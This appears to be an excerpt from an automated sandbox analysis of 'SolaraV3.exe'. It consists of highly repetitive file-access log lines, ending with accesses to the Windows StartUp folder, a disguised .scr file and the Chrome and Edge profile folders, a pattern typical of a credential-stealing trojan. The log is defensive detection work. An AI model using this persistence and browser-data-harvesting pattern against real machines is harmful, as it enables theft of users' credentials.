Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
